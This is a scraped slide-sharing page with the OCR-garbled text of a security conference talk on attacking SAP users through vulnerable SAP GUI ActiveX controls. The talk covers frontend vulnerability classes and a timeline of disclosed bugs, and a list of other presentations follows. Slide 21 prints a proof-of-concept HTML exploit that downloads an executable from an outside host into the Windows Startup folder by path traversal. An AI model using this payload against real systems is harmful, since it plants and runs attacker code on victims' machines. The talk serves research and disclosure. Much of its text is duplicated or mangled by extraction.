sap security attacking sap users attacking sap users with
play

SAP Security: Attacking SAP users Attacking SAP users with - PowerPoint PPT Presentation

Aug 22, 2023 •327 likes •924 views

SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1 Alexander @sh2kerr Polyakov. PCI QSA,PA-QSA 11 We change look but we keep mind Company Digital Security Research Group International

  1. SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1 Alexander @sh2kerr Polyakov. PCI QSA,PA-QSA

  2. 11 We change look but we keep mind

  3. Company Digital Security Research Group – International subdivision of Digital Security company focused on Research and Development in area of Enterprise business Applications (ERP,CRM,SRM) and technology networks (SCADA,SDC,GRID) d t h l t k (SCADA SDC GRID) • ERP and SAP security assessment and pentest • ERPSCAN security scanner development • ERPSCAN online service for SAP ERPSCAN online service for SAP • SCADA security assessment/ pentest/ stuxnet forensics Digital Security - one of the oldest and leading security consulting companies in Russia from 2002. • Consulting, Certification, Compliance ISO,PCI,PA-DSS etc • • Penetration testing security assessment application security Penetration testing, security assessment, application security • Information security awareness

  4. Tweet @sh2kerr  CTO at (http://dsec.ru)  Head of (http://dsecrg.com)  Architect (http://erpscan.com)  Project leader OWASP-EAS  Expert member (http://pcidss.ru ) E t b (htt // id )  Author of first Russian book about Oracle Database security “Oracle Security from the Eye of the Auditor Attack and Defense” (in Russian) Oracle Security from the Eye of the Auditor. Attack and Defense (in Russian)  Found a lot of vulnerabilities in SAP, Oracle , IBM… solutions  Speaker at HITB, Source,Troopers10,T2, InfosecurityRussia, PCIDSSRUSSIA2010 Ruscrypto, Speaker at HITB, Source,Troopers10,T2, InfosecurityRussia, PCIDSSRUSSIA2010 Ruscrypto, Chaos Constructions

  5. Agenda • SAP security in common SAP security in common • Attacking SAP users • SAP Stuxnet Prototype • SAP Stuxnet Prototype • Mitgations 11

  6. ERP ERP-Enterprise resource planning is an integrated computer- based system used to manage internal and external resources y g including tangible assets, financial resources, materials, and human resources . from Wikipedia Business applications like ERP, CRM, SRM and others are one of the major topics within the field of computer security j p p y as these applications store business data and any vulnerability in these applications can cause a significant monetary loss or even stoppage of business. y pp g

  7. Why care By 2009 number of published advisories grow • In ERP software ~ 100 I ERP ft 100 • in Database software ~ 100 • in App Servers software • in App Servers software ~ 100 100 • Number of SAP Notes grow in 2010 by 2 times (~300 in 2010) • Last month ~40 SAP Notes • Last month ~40 SAP Notes • Source: Source: • Business application vulnerability statistics and trends by D.Evdokimov & D Chastuhin http://dsecrg.com/pages/pub/show.php?id=30 • • OWASP EAS OWASP-EAS http://www.owasp.org/index.php/Category:OWASP_Enterprise_Application_Security_Project

  8. ERP features • ERP systems have a complex structure (complexity kills security ) ERP t h l t t ( l it kill it ) • Access for limited people inside a company (closed world) • Contain many different vulnerabilities in all the levels from network Contain many different vulnerabilities in all the levels from network to application • Huge amount customization (impossible to apply one security Huge amount customization (impossible to apply one security model for all) • Rarely updated because administrators are scared they can be broken during updates

  9. SAP Security Security SAP

  10. Where? • Network Architecture • OS • Database • Application Application • Presentation (Client-side) When we trying to secure ERP system we must do it at all levels

  11. Other •“ Technical Aspects of SAP Security ” - Alexander Polyakov @ T2.fi 2009 “ T h i l A t f SAP S it ” Al d P l k @ T2 fi 2009 •“ SAP security: Attacking SAP users ” - Alexander Polyakov (Whitepaper) http://dsecrg.com/pages/pub/show.php?id=20 •“ Some notes on SAP security ” – Alexander Polyakov @ Troopers 2010 “ S t SAP it ” Al d P l k @ T 2010 http://www.troopers.de/content/e728/e897/e910/TROOPERS10_Some_notes_on_SAP_security_Alexander_Polyakov.pdf •“ Attacking SAP users with sapsploit ” – Alexander Polyakov @HITB AMS 2010 http://dsecrg com/pages/pub/show php?id=27 http://dsecrg.com/pages/pub/show.php?id=27 • “ ERP Security: Myths,Problems,Solutions ” - Alexander Polyakov @ SourceBarcelona http://dsecrg.com/pages/pub/show.php?id=30 Also: • SAP guides and SAP notes • Mariano’s talks from HITB and BLACKHAT • Methodologies OWASP-EAS / BIZEC

  12. Real life situation: During one of our sap penetration tests we found that SAP infrastructure was securely separated from users network so one of the possible ways to attack this network was getting access to users workstations which can get access to SAP servers

  13. Attack users • Users are less secure • There are thousands SAP users in one company • Can attack them even if Server is fully secured • Can attack them from outside • Can use them as proxy for attacking servers • They are stupid )

  14. SAP client software • SAPGUI SAPGUI • JAVAGUI (usually in NIX so don’t touch this :) • WEBGUI (Browser) • WEBGUI (Browser) • NWBC • RFC RFC • Applications such as VisualAdmin, Mobile client and many-many other stuff

  15. SAPGUI • Most common • Almost at any SAP workstation in a company • Don’t have simple auto update Don t have simple auto update • Rarely patched (by users) In reality administrators even don’t think that SAPGUI must be updated (just functional updates maybe)

  17. OWASP-EAS top 10 Frontend vulns 1 Buffer overflows (ActiveX ) 2 Exposed Dangerous Method or Function (ActiveX) 3 Insecure scripting server access 4 File handling Frontend vulnerabilities 4 File handling Frontend vulnerabilities 5 Use of a Broken or Risky Cryptographic Algorithm 6 Cleartext Storage of Sensitive Information 7 Use of Hard-coded Password 8 Lack of integrity checking for front-end application 9 Cleartext Transmission of Sensitive Information 9 Cleartext Transmission of Sensitive Information 10 Vulnerable remote services http://www.owasp.org/index.php/Category:OWASP_Enterprise_Application_Security_Project#tab=Development_guides

  18. EASFV-1(Buffer Overflows) • About 1000 ActiveX in SAP GUI • In 16 founded vulns • Any of them potentially vulnerable Any of them potentially vulnerable • User interaction is needed to exploit • 10 50% of successful exploitation depending on users • 10-50% of successful exploitation depending on users awareness P.S. Beware of 3-rd party components h http://dsecrg.com/pages/vul/show.php?id=117 //d / / l/ h h ?id 117

  19. EASFV-1(Timeline) Date Vulnerable Author Vulnerabilit Link Component y 04.01.2007 Rfcguisink Mark Litchfield BOF http://www.ngssoftware.com/advisories/high-risk-vulnerability-in- enjoysap-stack-overflow/ 04.01.2007 Kwedit Mark Litchfield BOF http://www.ngssoftware.com/advisories/high-risk-vulnerability-in- p g g y enjoysap-stack-overflow/ 07.11.2008 Mdrmsap Will Dormann BOF http://www.securityfocus.com/bid/32186/info 07.01.2009 Sizerone Carsten Eiram BOF http://www.securityfocus.com/bid/33148/info 31.03.2009 WebWiewer3D Will Dormann BOF http://www.securityfocus.com/bid/34310/info 15.04.2009 Kwedit Carsten Eiram Insecure Method http://secunia.com/secunia_research/2008-56/ 08.06.2009 Sapirrfc Alexander Polyakov ( DSecRG) BOF http://dsecrg.com/pages/vul/show.php?id=115 28.09.2009 WebWiewer3D Alexander Polyakov ( DSecRG) Insecure Method http://dsecrg.com/pages/vul/show.php?id=143 28.09.2009 WebWiewer2D Alexander Polyakov ( DSecRG) Insecure Method http://dsecrg.com/pages/vul/show.php?id=144 07.10.2009 VxFlexgrid Elazar Broad , BOF http://dsecrg.com/pages/vul/show.php?id=117 Alexander Polyakov ( DSecRG) 23.03.2010 BExGlobal Alexey Sintsov ( DSecRG) Insecure Method http://dsecrg.com/pages/vul/show.php?id=164 ??? Kwedit Alexander Polyakov, Alexey Troshichev Insecure Method http://dsecrg.com/pages/vul/show.php?id=145 ( DSecRG) 14 DEC 2010 DSECRG-09-069 Alexey Sintsov ( DSecRG) Memory Corruption Later on http://dsecrg.com/pages/vul/show.php?id=169 14 DEC 2010 DSECRG-09-070 Alexey Sintsov (DSecRG) Format String Later on http://dsecrg.com/pages/vul/show.php?id=170 ??? DSECRG-00173 Alexander Polyakov (DSecRG) Insecure Method Later or dsecrg.com 18

  20. EASFV-2 (Insecure methods) There are ActiveX controls that can: • Download and exec executables such as Trojans D l d d t bl h T j • Run any OS command • Read or Write files • Overwrite or Delete files • Steal credentials by smbrelay • Connect to SAP servers Connect to SAP servers

  21. EASFV-2 (Upload and Exec) <html> <title>DSecRG SAP ActiveX download and execute</title> <object classid="clsid:2137278D-EF5C-11D3-96CE-0004AC965257" id=‘test'></object> <script language='Javascript'> function init() { var url = "http://172.16.0.1/notepad.exe"; var FileName='/../../../../../../../../../Documents and Settings/All Users/Start menu/Programs/Startup/notepad.exe'; / / / / test.Comp_Download(url,FileName); </script> DSecRG </html> / [DSECRG-09-045] http://dsecrg.com/pages/vul/show.php?id=145 fixed with security note 1294913 and a workaround provided with security note 1092631

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Attacking the Baseband Modem of Mobile Phones to Breach the Users Privacy and Network Security

Attacking the Baseband Modem of Mobile Phones to Breach the Users Privacy and Network Security

Attacking the Baseband Modem of Mobile Phones to Breach the Users Privacy and Network Security Dr. Christos Xenakis Dr. Christoforos Ntantogian Associate Professor, Department of Digital Systems School of Information and Communication

524 views • 26 slides
Who Whos Really Attacking Y s Really Attacking Your our #WHOAMI Threat

Who Whos Really Attacking Y s Really Attacking Your our #WHOAMI Threat

Who Whos Really Attacking Y s Really Attacking Your our #WHOAMI Threat Researcher at Trend Micro- research and blogger on criminal underground, persistent threats,

792 views • 44 slides
JWT Parkour Attacking JSON WEB TOKENS Louis Ny ff enegger @PentesterLab

JWT Parkour Attacking JSON WEB TOKENS Louis Ny ff enegger @PentesterLab

JWT Parkour Attacking JSON WEB TOKENS Louis Ny ff enegger @PentesterLab louis@pentesterlab.com About me Security Engineer Pentester/Code Reviewer/Security consultant/Security architect/IANAC Run a website to help people learn security

1.28k views • 79 slides
y g sws1 1 Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna

y g sws1 1 Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna

Security bug of the week (in iOS and OS X) y g sws1 1 Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna University of Technology for some of these slides sws1 2 2 Attacking the stack g We have seen how the

850 views • 47 slides
Attacking a co-hosted VM A hacker, a hammer and two memory modules 1 Who we are (1) Mehdi

Attacking a co-hosted VM A hacker, a hammer and two memory modules 1 Who we are (1) Mehdi

Attacking a co-hosted VM A hacker, a hammer and two memory modules 1 Who we are (1) Mehdi Talbi Security researcher at Stormshield haka-security project. Past life: academia (phd, postdoc, ) Main research topics: advanced

1.61k views • 94 slides
Revisiting iOS Kernel (In)Security: Attacking the Early Random PRNG Tarjei Mandt CanSecWest 2014

Revisiting iOS Kernel (In)Security: Attacking the Early Random PRNG Tarjei Mandt CanSecWest 2014

Revisiting iOS Kernel (In)Security: Attacking the Early Random PRNG Tarjei Mandt CanSecWest 2014 tm@azimuthsecurity.com @kernelpool About Me Senior Security Researcher at Azimuth Security Masters degree in Information Security

1.24k views • 76 slides
Attacking Authentication Professor Larry Heimann Web Application Security Information Systems

Attacking Authentication Professor Larry Heimann Web Application Security Information Systems

Attacking Authentication Professor Larry Heimann Web Application Security Information Systems Challenge from last class Importance of checking every step of the process Simple ways to defend against this attack Data from an analysis of

368 views • 19 slides
Attacking Authentication Professor Larry Heimann Web Application Security Information Systems

Attacking Authentication Professor Larry Heimann Web Application Security Information Systems

Attacking Authentication Professor Larry Heimann Web Application Security Information Systems Challenge from last class Just like fishing, it can be frustrating at times most needed multiple attempts, which is fine casting

483 views • 19 slides
Attacking JAVA Serialized Communication Manish S. Saindane Who am I ? Security Researcher

Attacking JAVA Serialized Communication Manish S. Saindane Who am I ? Security Researcher

ATTACK &amp; &amp; ATTACK labs DEFENSE DEFENSE Attacking JAVA Serialized Communication Manish S. Saindane Who am I ? Security Researcher Working as a Lead Applica8on Security Specialist for an interna8onal so:ware development and

577 views • 28 slides
TPM Genie Attacking the Hardware Root of Trust For Less Than $50 Introduction Jeremy Boone

TPM Genie Attacking the Hardware Root of Trust For Less Than $50 Introduction Jeremy Boone

TPM Genie Attacking the Hardware Root of Trust For Less Than $50 Introduction Jeremy Boone @uffeux Principal Consultant @ NCC Group Focus on hardware and embedded systems security Previously: 10 years product security @

1.41k views • 54 slides
Attacking Session Management Professor Larry Heimann Web Application Security Information Systems

Attacking Session Management Professor Larry Heimann Web Application Security Information Systems

Attacking Session Management Professor Larry Heimann Web Application Security Information Systems Lab 3 Review on CSRF &amp; Path Traversal Hacker Wall of Fame (Lab 3 members in italics) Jacob Buckheit (2x) Jenny Zhu Ti ff any Chen

238 views • 13 slides
Introduction to Security Attacking Networks Ming Chow (mchow@cs.tufts.edu) Twitter: @0xmchow

Introduction to Security Attacking Networks Ming Chow (mchow@cs.tufts.edu) Twitter: @0xmchow

Introduction to Security Attacking Networks Ming Chow (mchow@cs.tufts.edu) Twitter: @0xmchow Motivation You may be wondering how the PCAPs for the Packet Sleuth lab were obtained, especially the one from arguably the worlds most

607 views • 45 slides
ATTACKING IPV6 IMPLEMENTATION USING FRAGMENTATION Antonios Atlasis, antonios.atlasis@cscss.org

ATTACKING IPV6 IMPLEMENTATION USING FRAGMENTATION Antonios Atlasis, antonios.atlasis@cscss.org

ATTACKING IPV6 IMPLEMENTATION USING FRAGMENTATION Antonios Atlasis, antonios.atlasis@cscss.org Centre for Strategic Cyberspace + Security Science Bio Independent IT Security analyst and researcher. Over 20 years of diverse Information

1.11k views • 82 slides
Attacking with HTML5 Lavakumar Kuppan Who am I ? Web Security Researcher of Attack and

Attacking with HTML5 Lavakumar Kuppan Who am I ? Web Security Researcher of Attack and

A TTACK TTACK &amp; D EFENSE EFENSE labs Attacking with HTML5 Lavakumar Kuppan Who am I ? Web Security Researcher of Attack and Defense Labs, www.andlabs.org Penetration Tester @ really big bank Author of Imposter &amp; Shell

872 views • 58 slides
Leveraging Physical Models for Attacking and Defending PLCs Luis Garcia 4N6 Cyber Security &amp;

Leveraging Physical Models for Attacking and Defending PLCs Luis Garcia 4N6 Cyber Security &amp;

Leveraging Physical Models for Attacking and Defending PLCs Luis Garcia 4N6 Cyber Security &amp; Forensics Research Lab ECE Department Rutgers University Outline Background Harvey: Model-Aware Rootkit System Model

934 views • 71 slides
Attacking and Fixing PKCS#11 Security Tokens with Tookan Graham Steel LSV, INRIA &amp; CNRS

Attacking and Fixing PKCS#11 Security Tokens with Tookan Graham Steel LSV, INRIA &amp; CNRS

Attacking and Fixing PKCS#11 Security Tokens with Tookan Graham Steel LSV, INRIA &amp; CNRS &amp; ENS-Cachan (joint work with Riccardo Focardi, Matteo Bortolozzo &amp; Matteo Centenaro, Universit` a Ca Foscari, Venezia) 1/16 RSA Public

569 views • 17 slides
Spiral Content Mapping Combinational Sequential System Level Implementation Spiral Theory

Spiral Content Mapping Combinational Sequential System Level Implementation Spiral Theory

2-1.1 2-1.2 Spiral Content Mapping Combinational Sequential System Level Implementation Spiral Theory Project Design Design Design and Tools Performance Decoders and Structural Verilog 1 metrics (latency muxes

742 views • 15 slides
r t ts t

r t ts t

r t ts t rt t t rr srs srr s rt

930 views • 52 slides
The Active Versus Passive Management Debate In Defense of Active Management Thierry Roncalli

The Active Versus Passive Management Debate In Defense of Active Management Thierry Roncalli

From active investing to factor investing The rise of systematic management The active share debate The performance debate The Active Versus Passive Management Debate In Defense of Active Management Thierry Roncalli Amundi Asset

617 views • 61 slides
Browser and Network request Browser website CS 4803 reply Network OS Computer and Network

Browser and Network request Browser website CS 4803 reply Network OS Computer and Network

Browser and Network request Browser website CS 4803 reply Network OS Computer and Network Security Hardware Alexandra (Sasha) Boldyreva Browser sends requests May reveal private information (in forms, cookies) Web security.

517 views • 7 slides
Feedback Control for Real-Time Systems Chenyang Lu Cyber-Physical Systems Laboratory Department

Feedback Control for Real-Time Systems Chenyang Lu Cyber-Physical Systems Laboratory Department

Feedback Control for Real-Time Systems Chenyang Lu Cyber-Physical Systems Laboratory Department of Computer Science and Engineering CPS Week 2013 Outline q CPU UClizaCon Control for Distributed Real-Time Systems q Model PredicCve Control q

691 views • 37 slides
Meerkat: Multicore-Scalable Replicated Transactions Following the Zero Coordination Principle 1

Meerkat: Multicore-Scalable Replicated Transactions Following the Zero Coordination Principle 1

Meerkat: Multicore-Scalable Replicated Transactions Following the Zero Coordination Principle 1 Distributed storage systems are getting faster Peak throughput (million txns/s) Can we achieve this? 10 in-memory, kernel-bypass 8 6 4

458 views • 12 slides
Ajax Thierry Sans Ajax - fetching data without refreshing the page id=scACRSm... Ajax anything

Ajax Thierry Sans Ajax - fetching data without refreshing the page id=scACRSm... Ajax anything

Ajax Thierry Sans Ajax - fetching data without refreshing the page id=scACRSm... Ajax anything Javascript Why do we need Ajax? So far, when we wanted to send data to the server or retrieve data from the server we had to refresh

1.01k views • 8 slides
Introduction to the XVR technology: the basic framework Franco Tecchia franco@sssup.it Why you

Introduction to the XVR technology: the basic framework Franco Tecchia franco@sssup.it Why you

Introduction to the XVR technology: the basic framework Franco Tecchia franco@sssup.it Why you should NOT use XVR It only works under Windowz It only works under Windowz The kernel of XVR is closed source The kernel of XVR is

1.46k views • 67 slides

More recommend